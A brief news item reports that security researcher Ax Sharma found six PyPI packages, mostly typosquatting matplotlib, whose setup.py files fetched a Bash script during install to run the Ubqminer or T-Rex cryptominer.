Multiple PyPI packages installing cryptominers were caught this week by security researcher Ax Sharma. Six different packages, most of them impersonating the popular “matplotlib” Python package used to create graphs and visualizations, all used similar spellings or wording in an attempt to dupe unsuspecting victims into using the malicious package instead. In a blog post, Sharma found that the malicious setup.py files in the package installations were downloading a Bash script from a GitHub repository during the package installation. These scripts were downloading a cryptominer known as “Ubqminer” which mined for the Ubiq cryptocurrency. Another version of the malicious package installer opted for open-source T-Rex which allowed the attacker to use the victim’s GPU instead of the CPU when mining.
By Akshay Rohatgi and Randy Pargman About this Student Research Project Binary Defense’s mission is